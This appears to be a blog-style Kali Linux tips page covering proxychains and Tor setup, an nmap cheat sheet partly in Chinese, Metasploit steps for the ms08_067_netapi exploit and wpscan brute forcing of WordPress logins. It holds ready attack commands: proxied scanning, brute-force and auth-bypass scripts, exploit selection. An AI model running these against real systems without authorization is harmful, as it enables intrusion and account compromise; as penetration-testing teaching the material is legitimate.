Kali Usage Tips and Tricks

Kali Linux is a Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. Kali contains several hundred tools which are geared towards various information security tasks, such as Penetration Testing, Security research, Computer Forensics and Reverse Engineering.

Download Kali: https://www.kali.org/downloads/

Basic Configuration Videos:

1. Use Proxychains and Tor to Visit Internet

1.1 Configure Proxychains

root@Kali:~# vi /etc/proxychains.conf

You can choose between dynamic_chain, stric_chain or random_chaim. Dynamic_chain will be preferred.

# proxychains.conf VER 3.1
#
# HTTP, SOCKS4, SOCKS5 tunneling proxifier with DNS.
#
# The option below identifies how the ProxyList is treated.
# only one option should be uncommented at time,
# otherwise the last appearing option will be accepted
#
dynamic_chain
#
# Dynamic - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# at least one proxy must be online to play in chain
# (dead proxies are skipped)
# otherwise EINTR is returned to the app
#
#strict_chain
#
# Strict - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# all proxies must be online to play in chain
# otherwise EINTR is returned to the app
#
#random_chain
#
# Random - Each connection will be done via random proxy
# (or proxy chain, see chain_len) from the list.
# this option is good to test your IDS :)

You also can append some of your known proxy server list at the end of proxychains.conf file.

# ProxyList format 
#       type  host  port [user pass] 
#       (values separated by 'tab' or 'blank') 
# 
# 
#        Examples: 
# 
#               socks5  192.168.67.78   1080    lamer   secret 
#               http    192.168.89.3    8080    justu   hidden 
#               socks4  192.168.1.49    1080 
#               http    192.168.39.93   8080 
# 
# 
#       proxy types: http, socks4, socks5 
#        ( auth types supported: "basic"-http  "user/pass"-socks ) 
# 
[ProxyList] 
# add proxy here ... 
# meanwile 
# defaults set to "tor" 
socks4  127.0.0.1 9050 
socks5  98.26.2.3 1893 
socks5 76.22.86.10 1658 

1.2 Install Tor
You will need to add a correct version source into /etc/apt/sorces.list file. Else your installation will fail.

echo "deb http://http.kali.org/kali kali-rolling main contrib non-free" > /etc/apt/sources.list && apt-get update && apt-get install tor -y && apt autoremove -y

1.3 Use Proxychains to access Internet

You can run a nmap scan using Proxychains which will force the scan to run through one of the proxies in your list by typing in the following command into terminal:

proxychains nmap scanme.nmap.org

You can also test Proxychains with Firefox:

proxychains firefox www.duckduckgo.com

proxychains curl icanhazip.com



YouTube Video:

Using proxychains to start msfconsole:

root@kali:~# proxychains msfconsole 
ProxyChains-3.1 (http://proxychains.sf.net) 
|DNS-request| 0.0.0.0  
|S-chain|-<>-127.0.0.1:9050-<--timeout 
|DNS-response|: 0.0.0.0 is not exist 
     ,           , 
     /             \ 
   ((__---,,,---__)) 
     (_) O O (_)_________ 
          \ _ /             |\ 
          o_o \   M S F   | \ 
                \   _____  |  * 
                 |||    WW ||| 
                 |||        ||| 

Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro 
-- type 'go_pro' to launch it now. 

       =[ metasploit v4.7.0-2013082802 [core:4.7 api:1.0] 
+ -- --=[ 1161 exploits - 641 auxiliary - 180 post 
+ -- --=[ 310 payloads - 30 encoders - 8 nops 

msf >

2. Discover alive machines in target network

root@kali:~# fping -g -r 0 -s 192.168.2.0/24 | grep alive
192.168.2.1 is alive
192.168.2.2 is alive
192.168.2.4 is alive
192.168.2.31 is alive
192.168.2.50 is alive
192.168.2.200 is alive

     254 targets
       6 alive
     248 unreachable
       0 unknown addresses

     248 timeouts (waiting for response)
     254 ICMP Echos sent
       6 ICMP Echo Replies received
       0 other ICMP received

 4.49 ms (min round trip time)
 4.92 ms (avg round trip time)
 5.14 ms (max round trip time)
        3.288 sec (elapsed real time)

3. Use Nmap to scan targets
3.1 扫描单个目标地址
nmap 192.168.0.100
3.2 扫描多个目标地址
nmap 192.168.0.100 192.168.0.105
3.3 扫描一个范围内的目标地址
nmap 192.168.0.100-110
3.4 扫描目标地址所在的某个网段
nmap 192.168.0.0/24
3.5 扫描主机列表targets.txt中的所有目标地址
nmap -iL d:\targets.txt
3.6 扫描除某一个目标地址之外的所有目标地址
nmap 192.168.0.0/24 -exclude 192.168.109.105
3.7 扫描除某一文件中的目标地址之外的目标地址
nmap 192.168.0.0/24 -excludefile d:\targets.txt
3.8 扫描某一目标地址的21、22、23、80端口
nmap 192.168.0.100 -p 21,22,23,80
3.9 对目标地址进行路由跟踪
nmap --traceroute 192.168.0.105
3.10 扫描目标地址所在C段的在线情况
nmap -sP 192.168.0.0/24
3.11 目标地址的操作系统指纹识别
nmap -O 192.168.0.105
3.12 目标地址提供的服务版本检测
nmap -sV 192.168.0.105
3.13 探测防火墙状态
在实战中，可以利用FIN扫描的方式探测防火墙的状态。FIN扫描用于识别端口是否关闭，收到RST回复说明该端口关闭，否则就是open或filtered状态。
nmap -sF -T4 192.168.0.105
3.14 鉴权扫描: 使用--script=auth可以对目标主机或目标主机所在的网段进行应用弱口令检测
nmap --script=auth 192.168.0.105
3.15 暴力破解攻击: nmap具有暴力破解的功能，可对数据库、SMB、SNMP等进行简单密码的暴力猜解
nmap --script=brute 192.168.0.105
3.16 扫描常见的漏洞: nmap具有漏洞扫描的功能，可以检查目标主机或网段是否存在常见的漏洞
nmap --script=vuln 192.168.0.105
3.17 应用服务扫描: nmap具备很多常见应用服务的扫描脚本，例如VNC服务、MySQL服务、Telnet服务、Rsync服务等，以VNC服务为例
nmap --script=realvnc-auth-bypass 192.168.0.105
3.18 探测局域网内更多服务开启的情况:
nmap -n -p 445 --script=broadcast 192.168.0.105
3.19 whois解析: 利用第三方的数据库或资源查询目标地址的信息，例如进行whois解析
nmap -script external baidu.com

root@kali:~# nmap -T4 -O 192.168.2.31 192.168.2.200

Starting Nmap 7.60 ( https://nmap.org ) at 2019-01-19 21:35 EST
Nmap scan report for 192.168.2.31
Host is up (0.31s latency).
Not shown: 990 closed ports
PORT      STATE    SERVICE
135/tcp   open     msrpc
139/tcp   open     netbios-ssn
445/tcp   open     microsoft-ds
514/tcp   filtered shell
3389/tcp  open     ms-wbt-server
5357/tcp  open     wsdapi
7070/tcp  open     realserver
49152/tcp open     unknown
49153/tcp open     unknown
49154/tcp open     unknown
Device type: general purpose
Running: Microsoft Windows XP|7|2012
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012
OS details: Microsoft Windows XP SP3, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012

Nmap scan report for 192.168.2.200
Host is up (0.12s latency).
Not shown: 995 closed ports
PORT    STATE    SERVICE
80/tcp  open     http
139/tcp open     netbios-ssn
443/tcp open     https
445/tcp open     microsoft-ds
514/tcp filtered shell
Aggressive OS guesses: Actiontec MI424WR-GEN3I WAP (99%), DD-WRT v24-sp2 (Linux 2.4.37) (98%), Linux 3.2 (97%), Linux 4.4 (97%), Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012 (96%), Microsoft Windows XP SP3 (96%), BlueArc Titan 2100 NAS device (91%)
No exact OS matches for host (test conditions non-ideal).

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 136.89 seconds
root@kali:~# 

4. MSF - Metaspoit 
4.1 Basic Usage and Steps

• search smb
• use exploit/windows/smb/ms08_067_netapi
• show options
• set RHOST 192.168.230.145
• set target 41
•  exploit

4.2 YouTube - Kali Metasploit Exploit FTP Service on VSFTPD:

4.3 YouTube - Kali Metasploit Exploit Samba Service:

4.4. wpscan to attack WordPress

Use wpscan to start a simple attack WordPress site

root@localhost:~# wpscan -u 10.94.200.81

list wordpress user

root@localhost:~# wpscan -u 10.94.200.81 -e u vp

Use wordlist to brute force WordPress account

root@localhost:~# wpscan -u 10.94.200.81 -e u --wordlist /usr/share/wordlists/metasploit/common-roots.txt

Youtube Video:

4.5. Exploit Windows 7 or Windows 2008 Servers
YouTube video: Using EternalBlue Vulnerability to Exploit Windows 2008 Server

References:
1. tor instaling